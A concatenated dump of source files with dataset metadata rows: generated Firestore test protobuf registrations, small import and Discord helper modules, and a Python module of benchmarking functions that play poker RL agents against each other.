__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.QueryTest)
),
)
_sym_db.RegisterMessage(QueryTest)
Clause = _reflection.GeneratedProtocolMessageType(
"Clause",
(_message.Message,),
dict(
DESCRIPTOR=_CLAUSE,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Clause)
),
)
_sym_db.RegisterMessage(Clause)
Select = _reflection.GeneratedProtocolMessageType(
"Select",
(_message.Message,),
dict(
DESCRIPTOR=_SELECT,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Select)
),
)
_sym_db.RegisterMessage(Select)
Where = _reflection.GeneratedProtocolMessageType(
"Where",
(_message.Message,),
dict(
DESCRIPTOR=_WHERE,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Where)
),
)
_sym_db.RegisterMessage(Where)
OrderBy = _reflection.GeneratedProtocolMessageType(
"OrderBy",
(_message.Message,),
dict(
DESCRIPTOR=_ORDERBY,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.OrderBy)
),
)
_sym_db.RegisterMessage(OrderBy)
Cursor = _reflection.GeneratedProtocolMessageType(
"Cursor",
(_message.Message,),
dict(
DESCRIPTOR=_CURSOR,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Cursor)
),
)
_sym_db.RegisterMessage(Cursor)
DocSnapshot = _reflection.GeneratedProtocolMessageType(
"DocSnapshot",
(_message.Message,),
dict(
DESCRIPTOR=_DOCSNAPSHOT,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.DocSnapshot)
),
)
_sym_db.RegisterMessage(DocSnapshot)
FieldPath = _reflection.GeneratedProtocolMessageType(
"FieldPath",
(_message.Message,),
dict(
DESCRIPTOR=_FIELDPATH,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.FieldPath)
),
)
_sym_db.RegisterMessage(FieldPath)
ListenTest = _reflection.GeneratedProtocolMessageType(
"ListenTest",
(_message.Message,),
dict(
DESCRIPTOR=_LISTENTEST,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.ListenTest)
),
)
_sym_db.RegisterMessage(ListenTest)
Snapshot = _reflection.GeneratedProtocolMessageType(
"Snapshot",
(_message.Message,),
dict(
DESCRIPTOR=_SNAPSHOT,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.Snapshot)
),
)
_sym_db.RegisterMessage(Snapshot)
DocChange = _reflection.GeneratedProtocolMessageType(
"DocChange",
(_message.Message,),
dict(
DESCRIPTOR=_DOCCHANGE,
__module__="google.cloud.firestore_v1.proto.tests_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.firestore_v1.proto.DocChange)
),
)
_sym_db.RegisterMessage(DocChange)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(
descriptor_pb2.FileOptions(),
_b(
'\n)com.google.cloud.conformance.firestore.v1B\016TestDefinition\252\002"Google.Cloud.Firestore.Tests.Proto\312\002(Google\\Cloud\\Firestore\\Tests\\Conformance'
),
)
# @@protoc_insertion_point(module_scope)
| 32.515165
| 5,821
| 0.606424
| 7,814
| 71,826
| 5.263117
| 0.046967
| 0.047853
| 0.08705
| 0.08987
| 0.808491
| 0.770291
| 0.753903
| 0.732554
| 0.665054
| 0.649565
| 0
| 0.040892
| 0.28569
| 71,826
| 2,208
| 5,822
| 32.529891
| 0.760691
| 0.024601
| 0
| 0.761724
| 1
| 0.007579
| 0.162664
| 0.130965
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005211
| 0
| 0.005211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
89c94b33df9f614d0fedb9247f40688412b91cc6
| 66
|
py
|
Python
|
measurement/__init__.py
|
cgiacofei/pybrew
|
40062f9b6ccb96ca3cbbb9784434dd9281a9caba
|
[
"MIT"
] | null | null | null |
measurement/__init__.py
|
cgiacofei/pybrew
|
40062f9b6ccb96ca3cbbb9784434dd9281a9caba
|
[
"MIT"
] | null | null | null |
measurement/__init__.py
|
cgiacofei/pybrew
|
40062f9b6ccb96ca3cbbb9784434dd9281a9caba
|
[
"MIT"
] | null | null | null |
from measurement import onewire
from measurement import ds18b20
| 13.2
| 31
| 0.848485
| 8
| 66
| 7
| 0.625
| 0.535714
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 0.151515
| 66
| 4
| 32
| 16.5
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
89d6b4bc5b500728a1f2e6ebd693598faa7959b8
| 65
|
py
|
Python
|
libs/data.py
|
billydevyt/RoboBilly
|
6d79ab9626a6d6b487dd73688ad7187212e7864c
|
[
"MIT"
] | 6
|
2020-11-07T16:46:18.000Z
|
2021-01-03T11:52:39.000Z
|
libs/data.py
|
billyeatcookies/RoboBilly
|
6d79ab9626a6d6b487dd73688ad7187212e7864c
|
[
"MIT"
] | 3
|
2020-11-30T01:52:41.000Z
|
2021-01-03T11:53:18.000Z
|
libs/data.py
|
billyeatcookies/RoboBilly
|
6d79ab9626a6d6b487dd73688ad7187212e7864c
|
[
"MIT"
] | 7
|
2021-04-17T07:27:58.000Z
|
2021-08-31T15:21:42.000Z
|
import discord
def file():
return discord.File('output.png')
| 16.25
| 37
| 0.707692
| 9
| 65
| 5.111111
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 65
| 4
| 37
| 16.25
| 0.836364
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d6598b09517b75a15a2930ccad330b0444a210cc
| 25,175
|
py
|
Python
|
mod_comp_test.py
|
navidivan/poker_rl
|
a81bfcd7eb297b68fe03f92798c6abd657ddf6a3
|
[
"Apache-2.0"
] | 3
|
2020-08-30T19:27:02.000Z
|
2020-08-31T23:29:15.000Z
|
mod_comp_test.py
|
navidivan/poker_rl
|
a81bfcd7eb297b68fe03f92798c6abd657ddf6a3
|
[
"Apache-2.0"
] | null | null | null |
mod_comp_test.py
|
navidivan/poker_rl
|
a81bfcd7eb297b68fe03f92798c6abd657ddf6a3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Untitled49.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1yzdaM-t5sXo8yESVxjaN5DnYaUhyONxF
"""
import numpy as np
import pandas as pd
import copy
from mod_poker_5 import *
from mod_fe import *
from mod_agents import *
def bench(a , b=Agent_Simple_Rational(), debug=False):
winners = []
for i in range(100):
# print(i)
poker = Poker_5(debug=debug,single_hand=False)
log = ""
while poker.game_ended == 0:
# print('put = ', poker.obs['put'])
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
# action_number+=1
# index = action_number % num_samples
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# obs_now[index,:] = feature_engineering(obs_get)
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
# actions[index] = np.nonzero(act_get)[0]
# if obs_next[index-1,0] != 1 :
# obs_next[index-1,:] = feature_engineering(obs_get)
# actions_next[index-1] = np.nonzero(act_get)[0]
obs, rews, last_action = poker.step(act_get)
# rewards[index] = last_action[0]
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# print(feature_engineering(obs_get))
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
# print('sample to update: ', action_number)
# index = action_number % num_samples
# rewards[index] += rews[0]
# obs_next[index,0] = 1
row_added=1
# print(poker.game_winner)
winners.append(poker.game_winner)
win_per_Azero = 1 - np.count_nonzero(winners)/len(winners)
return win_per_Azero
def bench_AV(a , b=Agent_Simple_Rational(), debug=False):
winners = []
for i in range(100):
# print(i)
poker = Poker_5(debug=debug,single_hand=False)
log = ""
while poker.game_ended == 0:
# print('put = ', poker.obs['put'])
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
# action_number+=1
# index = action_number % num_samples
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# obs_now[index,:] = feature_engineering(obs_get)
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
# actions[index] = np.nonzero(act_get)[0]
# if obs_next[index-1,0] != 1 :
# obs_next[index-1,:] = feature_engineering(obs_get)
# actions_next[index-1] = np.nonzero(act_get)[0]
obs, rews, last_action = poker.step(act_get)
# rewards[index] = last_action[0]
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# print(feature_engineering(obs_get))
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
# print('sample to update: ', action_number)
# index = action_number % num_samples
# rewards[index] += rews[0]
# obs_next[index,0] = 1
row_added=1
# print(poker.game_winner)
winners.append(poker.game_winner)
win_per_Azero = 1 - np.count_nonzero(winners)/len(winners)
return win_per_Azero
def bench_hands(a , b=Agent_Simple_Rational()):
winners = []
for i in range(1000):
# print(i)
poker = Poker_5(single_hand=True)
log = ""
intial_stack = poker.obs['stacks'][0]
while poker.game_ended == 0:
# print('put = ', poker.obs['put'])
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
# action_number+=1
# index = action_number % num_samples
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# obs_now[index,:] = feature_engineering(obs_get)
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
# actions[index] = np.nonzero(act_get)[0]
# if obs_next[index-1,0] != 1 :
# obs_next[index-1,:] = feature_engineering(obs_get)
# actions_next[index-1] = np.nonzero(act_get)[0]
obs, rews, last_action = poker.step(act_get)
# rewards[index] = last_action[0]
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# print(feature_engineering(obs_get))
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
# print('sample to update: ', action_number)
# index = action_number % num_samples
# rewards[index] += rews[0]
# obs_next[index,0] = 1
row_added=1
end_stack = poker.obs['stacks'][0]
winners.append(end_stack -intial_stack )
win_per_Azero = np.mean(np.array(winners))
return win_per_Azero
def bench_hands_AV(a , b=Agent_Simple_Rational()):
winners = []
for i in range(1000):
# print(i)
poker = Poker_5(single_hand=True)
log = ""
intial_stack = poker.obs['stacks'][0]
while poker.game_ended == 0:
# print('put = ', poker.obs['put'])
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
# action_number+=1
# index = action_number % num_samples
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# obs_now[index,:] = feature_engineering(obs_get)
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
# actions[index] = np.nonzero(act_get)[0]
# if obs_next[index-1,0] != 1 :
# obs_next[index-1,:] = feature_engineering(obs_get)
# actions_next[index-1] = np.nonzero(act_get)[0]
obs, rews, last_action = poker.step(act_get)
# rewards[index] = last_action[0]
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
# print(feature_engineering(obs_get))
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
# print('sample to update: ', action_number)
# index = action_number % num_samples
# rewards[index] += rews[0]
# obs_next[index,0] = 1
row_added=1
end_stack = poker.obs['stacks'][0]
winners.append(end_stack -intial_stack )
win_per_Azero = np.mean(np.array(winners))
return win_per_Azero
def comp_test(agent_a):
winners = []
a= agent_a
b= Agent_Call_Any()
c= Agent_Raise_Any()
d= Agent_Random()
e= Agent_Simple_Rational()
f= Agent_Simple_Equity()
g= Agent_Allin_Any()
agent_a.epsilon = 0
print(agent_a.temp, 'atemp')
Agents=[a,b,c,d,e,f,g]
Agents_Array = 0.5*np.ones((len(Agents), len(Agents)))
columns, index = [],[]
for agent in Agents:
columns.append(agent.name)
index.append(agent.name)
import time
winners = []
for x,a in enumerate(Agents):
for y,b in enumerate(Agents):
if a==b:
continue
winners = []
for i in range(100):
poker = Poker_5()
log = ""
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
winners.append(poker.game_winner)
win_per_Azero = np.count_nonzero(winners)/len(winners)
print('{a} won {p} from {b}'.format(a=Agents[x].name, p=(1-win_per_Azero)*100, b=Agents[y].name))
Agents_Array[x,y] = 1- np.count_nonzero(winners)/len(winners)
log = pd.DataFrame(data=Agents_Array, index=index, columns=columns)
return log
###############################
def comp_test_AV(agent_a):
winners = []
a= agent_a
b= Agent_Call_Any()
c= Agent_Raise_Any()
d= Agent_Random()
e= Agent_Simple_Rational()
f= Agent_Simple_Equity()
g= Agent_Allin_Any()
agent_a.epsilon = 0
print(agent_a.temp, 'atemp')
Agents=[a,b,c,d,e,f,g]
Agents_Array = 0.5*np.ones((len(Agents), len(Agents)))
columns, index = [],[]
for agent in Agents:
columns.append(agent.name)
index.append(agent.name)
import time
winners = []
for x,a in enumerate(Agents):
for y,b in enumerate(Agents):
if a==b:
continue
winners = []
for i in range(100):
poker = Poker_5()
log = ""
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
winners.append(poker.game_winner)
win_per_Azero = np.count_nonzero(winners)/len(winners)
print('{a} won {p} from {b}'.format(a=Agents[x].name, p=(1-win_per_Azero)*100, b=Agents[y].name))
Agents_Array[x,y] = 1- np.count_nonzero(winners)/len(winners)
log = pd.DataFrame(data=Agents_Array, index=index, columns=columns)
return log
####
def tornument(Agents):
Agents_Array = 0.5*np.ones((len(Agents), len(Agents)))
for agent in Agents:
agent.epsilon = 0
columns, index = [],[]
for agent in Agents:
columns.append(agent.name)
index.append(agent.name)
import time
winners = []
for x,a in enumerate(Agents):
for y,b in enumerate(Agents):
try:
if abs(int(a.name) - int(b.name)) == 1 :
continue
except:
pass
winners = []
for i in range(40):
poker = Poker_5()
log = ""
steps = 0
while poker.game_ended == 0:
steps+=1
if steps>1000:
poker.game_winner = np.argmax(poker.obs['stacks'])
print('breaking!')
break
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
winners.append(poker.game_winner)
win_per_Azero = np.count_nonzero(winners)/len(winners)
print('{a} won {p} from {b}'.format(a=Agents[x].name, p=(1-win_per_Azero)*100, b=Agents[y].name))
Agents_Array[x,y] = 1- np.count_nonzero(winners)/len(winners)
log = pd.DataFrame(data=Agents_Array, index=index, columns=columns)
return log
###############################
def compare(a, recents):
winners = []
Agents=[a] + recents
Agents_Array = 0.5*np.ones((1, len(Agents)))
for agent in Agents:
agent.epsilon = 0
agent.temp= 0.01
columns, index = [],[a.name]
for agent in Agents:
columns.append(agent.name)
for y,b in enumerate(Agents):
if a==b:
continue
winners = []
for i in range(20):
poker = Poker_5()
log = ""
steps = 0
while poker.game_ended == 0:
steps+=1
if steps>1000:
poker.game_winner = np.argmax(poker.obs['stacks'])
print('breaking!')
break
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
winners.append(poker.game_winner)
win_per_Azero = np.count_nonzero(winners)/len(winners)
print('{a} won {p} from {b}'.format(a=Agents[0].name, p=(1-win_per_Azero)*100, b=Agents[y].name))
Agents_Array[0,y] = 1- np.count_nonzero(winners)/len(winners)
log = pd.DataFrame(data=Agents_Array, index=index, columns=columns)
return log
##########
def analyze(a , b=Agent_Simple_Rational()):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
winners = []
base = np.zeros((1,7))
for i in range(1000):
poker = Poker_5(single_hand=True)
log = ""
intial_stack = poker.obs['stacks'][0]
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
base[0, np.nonzero(act_get)] += 1
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
end_stack = poker.obs['stacks'][0]
winners.append(end_stack -intial_stack )
win_per_Azero = np.mean(np.array(winners))
base = base/np.sum(base) * 100
return win_per_Azero , base
def analyze_probs(a , b=Agent_Simple_Rational(), pokers = None):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
acts_1 = np.zeros((1,7))
if pokers is None:
pokers = []
print("making pokers")
for i in range(1000):
poker = Poker_5(single_hand=True)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
pokers.append(copy.deepcopy(poker))
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return acts_1, pokers
else:
for p in pokers:
poker = copy.deepcopy(p)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return acts_1, pokers
def analyze_probs_fast(a , b=Agent_Simple_Rational()):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
acts_1 = np.zeros((1,7))
pokers = []
print("making pokers")
for i in range(1000):
poker = Poker_5(single_hand=True)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
pokers.append(copy.deepcopy(poker))
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
acts_2 = np.zeros((1,7))
for p in pokers:
poker = copy.deepcopy(p)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action(poker.obs['player0_options'], feature_engineering(obs_get))
acts_2 = np.vstack([acts_2, act_get])
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return np.mean((acts_1 - acts_2)**2)
##################
def analyze_AV(a , b=Agent_Simple_Rational()):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
winners = []
base = np.zeros((1,7))
for i in range(1000):
poker = Poker_5(single_hand=True)
log = ""
intial_stack = poker.obs['stacks'][0]
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
base[0, np.nonzero(act_get)] += 1
obs, rews, last_action = poker.step(act_get)
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
end_stack = poker.obs['stacks'][0]
winners.append(end_stack -intial_stack )
win_per_Azero = np.mean(np.array(winners))
base = base/np.sum(base) * 100
return win_per_Azero , base
def analyze_probs_AV(a , b=Agent_Simple_Rational(), pokers = None):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
acts_1 = np.zeros((1,7))
if pokers is None:
pokers = []
print("making pokers")
for i in range(1000):
poker = Poker_5(single_hand=True)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
pokers.append(copy.deepcopy(poker))
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return acts_1, pokers
else:
for p in pokers:
poker = copy.deepcopy(p)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return acts_1, pokers
def analyze_probs_fast_AV(a , b=Agent_Simple_Rational()):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
acts_1 = np.zeros((1,7))
pokers = []
print("making pokers")
for i in range(1000):
poker = Poker_5(single_hand=True)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
pokers.append(copy.deepcopy(poker))
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
acts_2 = np.zeros((1,7))
for p in pokers:
poker = copy.deepcopy(p)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
acts_2 = np.vstack([acts_2, act_get])
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return np.mean((acts_1 - acts_2)**2)
| 35.20979
| 103
| 0.61569
| 3,659
| 25,175
| 4.018584
| 0.046461
| 0.066377
| 0.063656
| 0.073449
| 0.971776
| 0.970552
| 0.968852
| 0.968852
| 0.965248
| 0.960691
| 0
| 0.023334
| 0.242463
| 25,175
| 715
| 104
| 35.20979
| 0.74768
| 0.090129
| 0
| 0.95
| 1
| 0
| 0.061387
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024138
| false
| 0.022414
| 0.015517
| 0
| 0.067241
| 0.041379
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3890e7f7cecb4843f52ef4d482d15119a715771
| 94
|
py
|
Python
|
linora/feature_selection/__init__.py
|
Hourout/linora
|
4269516c9227a18bd1a65e1c6a59e73c74e874d0
|
[
"Apache-2.0"
] | 10
|
2018-11-22T03:30:39.000Z
|
2020-08-20T04:39:35.000Z
|
linora/feature_selection/__init__.py
|
Hourout/linora
|
4269516c9227a18bd1a65e1c6a59e73c74e874d0
|
[
"Apache-2.0"
